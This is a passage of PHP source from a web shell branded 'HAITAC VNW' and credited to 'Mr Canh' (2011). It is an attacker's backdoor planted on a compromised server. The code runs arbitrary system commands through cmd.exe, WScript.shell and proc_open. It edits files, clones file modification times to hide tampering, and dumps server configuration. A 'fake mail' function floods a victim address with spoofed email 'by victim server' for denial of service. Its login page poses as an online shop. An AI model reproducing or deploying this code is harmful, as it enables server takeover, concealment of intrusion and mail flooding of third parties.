'); formfooter(); }//end eval elseif ($action == 'editfile') { if(file_exists($opfile)) { $fp=@fopen($opfile,'r'); $contents=@fread($fp, filesize($opfile)); @fclose($fp); $contents=htmlspecialchars($contents); } formhead(array('title'=>'Create / Edit File')); makehide('action','file'); makehide('dir',$nowpath); makeinput(array('title'=>'Current File (import new file name and new file)','name'=>'editfilename','value'=>$opfile,'newline'=>1)); maketext(array('title'=>'File Content','name'=>'filecontent','value'=>$contents)); formfooter(); }//end editfile elseif ($action == 'newtime') { $opfilemtime = @filemtime($opfile); //$time = strtotime("$year-$month-$day $hour:$minute:$second"); $cachemonth = array('January'=>1,'February'=>2,'March'=>3,'April'=>4,'May'=>5,'June'=>6,'July'=>7,'August'=>8,'September'=>9,'October'=>10,'November'=>11,'December'=>12); formhead(array('title'=>'Clone file was last modified time')); makehide('action','file'); makehide('dir',$nowpath); makeinput(array('title'=>'Alter file','name'=>'curfile','value'=>$opfile,'size'=>120,'newline'=>1)); makeinput(array('title'=>'Reference file (fullpath)','name'=>'tarfile','size'=>120,'newline'=>1)); formfooter(); formhead(array('title'=>'Set last modified')); makehide('action','file'); makehide('dir',$nowpath); makeinput(array('title'=>'Current file (fullpath)','name'=>'curfile','value'=>$opfile,'size'=>120,'newline'=>1)); p('

Instead »'); p('year:'); makeinput(array('name'=>'year','value'=>date('Y',$opfilemtime),'size'=>4)); p('month:'); makeinput(array('name'=>'month','value'=>date('m',$opfilemtime),'size'=>2)); p('day:'); makeinput(array('name'=>'day','value'=>date('d',$opfilemtime),'size'=>2)); p('hour:'); makeinput(array('name'=>'hour','value'=>date('H',$opfilemtime),'size'=>2)); p('minute:'); makeinput(array('name'=>'minute','value'=>date('i',$opfilemtime),'size'=>2)); p('second:'); makeinput(array('name'=>'second','value'=>date('s',$opfilemtime),'size'=>2)); p('

'); formfooter(); }//end newtime elseif ($action == 'shell') { if (IS_WIN && IS_COM) { if($program && $parameter) { $shell= new COM('Shell.Application'); $a = $shell->ShellExecute($program,$parameter); m('Program run has '.(!$a ? 'success' : 'fail')); } !$program && $program = 'c:\windows\system32\cmd.exe'; !$parameter && $parameter = '/c net start > '.SA_ROOT.'log.txt'; formhead(array('title'=>'Execute Program')); makehide('action','shell'); makeinput(array('title'=>'Program','name'=>'program','value'=>$program,'newline'=>1)); p('

'); makeinput(array('title'=>'Parameter','name'=>'parameter','value'=>$parameter)); makeinput(array('name'=>'submit','class'=>'bt','type'=>'submit','value'=>'Execute')); p('

'); formfoot(); } formhead(array('title'=>'Execute Command')); makehide('action','shell'); if (IS_WIN && IS_COM) { $execfuncdb = array('phpfunc'=>'phpfunc','wscript'=>'wscript','proc_open'=>'proc_open'); makeselect(array('title'=>'Use:','name'=>'execfunc','option'=>$execfuncdb,'selected'=>$execfunc,'newline'=>1)); } p('

'); makeinput(array('title'=>'Command','name'=>'command','value'=>$command)); makeinput(array('name'=>'submit','class'=>'bt','type'=>'submit','value'=>'Execute')); p('

'); formfoot(); if ($command) { p('
');
        if ($execfunc=='wscript' && IS_WIN && IS_COM) {
            $wsh = new COM('WScript.shell');
            $exec = $wsh->exec('cmd.exe /c '.$command);
            $stdout = $exec->StdOut();
            $stroutput = $stdout->ReadAll();
            echo $stroutput;
        } elseif ($execfunc=='proc_open' && IS_WIN && IS_COM) {
            $descriptorspec = array(
               0 => array('pipe', 'r'),
               1 => array('pipe', 'w'),
               2 => array('pipe', 'w')
            );
            $process = proc_open($_SERVER['COMSPEC'], $descriptorspec, $pipes);
            if (is_resource($process)) {
                fwrite($pipes[0], $command."\r\n");
                fwrite($pipes[0], "exit\r\n");
                fclose($pipes[0]);
                while (!feof($pipes[1])) {
                    echo fgets($pipes[1], 1024);
                }
                fclose($pipes[1]);
                while (!feof($pipes[2])) {
                    echo fgets($pipes[2], 1024);
                }
                fclose($pipes[2]);
                proc_close($process);
            }
        } else {
            echo(execute($command));
        }
        p('
'); } }//end shell elseif ($action == 'phpenv') { $upsize=getcfg('file_uploads') ? getcfg('upload_max_filesize') : 'Not allowed'; $adminmail=isset($_SERVER['SERVER_ADMIN']) ? $_SERVER['SERVER_ADMIN'] : getcfg('sendmail_from'); !$dis_func && $dis_func = 'No'; $info = array( 1 => array('Server Time',date('Y/m/d h:i:s',$timestamp)), 2 => array('Server Domain',$_SERVER['SERVER_NAME']), 3 => array('Server IP',gethostbyname($_SERVER['SERVER_NAME'])), 4 => array('Server OS',PHP_OS), 5 => array('Server OS Charset',$_SERVER['HTTP_ACCEPT_LANGUAGE']), 6 => array('Server Software',$_SERVER['SERVER_SOFTWARE']), 7 => array('Server Web Port',$_SERVER['SERVER_PORT']), 8 => array('PHP run mode',strtoupper(php_sapi_name())), 9 => array('The file path',__FILE__), 10 => array('PHP Version',PHP_VERSION), 11 => array('PHPINFO',(IS_PHPINFO ? 'Yes' : 'No')), 12 => array('Safe Mode',getcfg('safe_mode')), 13 => array('Administrator',$adminmail), 14 => array('allow_url_fopen',getcfg('allow_url_fopen')), 15 => array('enable_dl',getcfg('enable_dl')), 16 => array('display_errors',getcfg('display_errors')), 17 => array('register_globals',getcfg('register_globals')), 18 => array('magic_quotes_gpc',getcfg('magic_quotes_gpc')), 19 => array('memory_limit',getcfg('memory_limit')), 20 => array('post_max_size',getcfg('post_max_size')), 21 => array('upload_max_filesize',$upsize), 22 => array('max_execution_time',getcfg('max_execution_time').' second(s)'), 23 => array('disable_functions',$dis_func), ); if($phpvarname) { m($phpvarname .' : '.getcfg($phpvarname)); } formhead(array('title'=>'Server environment')); makehide('action','phpenv'); makeinput(array('title'=>'Please input PHP configuration parameter(eg:magic_quotes_gpc)','name'=>'phpvarname','value'=>$phpvarname,'newline'=>1)); formfooter(); $hp = array(0=> 'Server', 1=> 'PHP'); for($a=0;$a<2;$a++) { p('

'.$hp[$a].' »

'); p(''); } }//end phpenv else { m('Undefined Action'); } //fake mail = Use victim server 4 DOS - fake mail if ( $id=="fake-mail"){ error_reporting(0); echo "

Fake Mail- DOS E-mail By Victim Server

" ; echo "
Victim Mail :

Number-Mail :

Comments:

"; //send Storm Mail $to=$_POST['to']; $nom=$_POST['nom']; $Comments=$_POST['Comments']; if ($to <> "" ){ for ($i = 0; $i < $nom ; $i++){ $from = rand (71,1020000000)."@"."tuoitre.vn"; $subject= md5("$from"); mail($to,$subject,$Comments,"From:$from"); echo "$i is ok"; } echo ""; } } //*** ?>
COPYRIGHT (C) 2011 By: Mr Canh Yahoo: giaouoctinhyeu2003 Email: haitacvnw@host-dl.com Name: Mr Canh
'; echo $msg; echo '
'; } function scookie($key, $value, $life = 0, $prefix = 1) { global $admin, $timestamp, $_SERVER; $key = ($prefix ? $admin['cookiepre'] : '').$key; $life = $life ? $life : $admin['cookielife']; $useport = $_SERVER['SERVER_PORT'] == 443 ? 1 : 0; setcookie($key, $value, $timestamp+$life, $admin['cookiepath'], $admin['cookiedomain'], $useport); } function multi($num, $perpage, $curpage, $tablename) { $multipage = ''; if($num > $perpage) { $page = 10; $offset = 5; $pages = @ceil($num / $perpage); if($page > $pages) { $from = 1; $to = $pages; } else { $from = $curpage - $offset; $to = $curpage + $page - $offset - 1; if($from < 1) { $to = $curpage + 1 - $from; $from = 1; if(($to - $from) < $page && ($to - $from) < $pages) { $to = $page; } } elseif($to > $pages) { $from = $curpage - $pages + $to; $to = $pages; if(($to - $from) < $page && ($to - $from) < $pages) { $from = $pages - $page + 1; } } } $multipage = ($curpage - $offset > 1 && $pages > $page ? 'First ' : '').($curpage > 1 ? 'Prev ' : ''); for($i = $from; $i <= $to; $i++) { $multipage .= $i == $curpage ? $i.' ' : '['.$i.'] '; } $multipage .= ($curpage < $pages ? 'Next' : '').($to < $pages ? ' Last' : ''); $multipage = $multipage ? '

Pages: '.$multipage.'

' : ''; } return $multipage; } // Login page function loginpage() { ?> title shop online order

Login
==[ HAITAC VNW ]==

Password: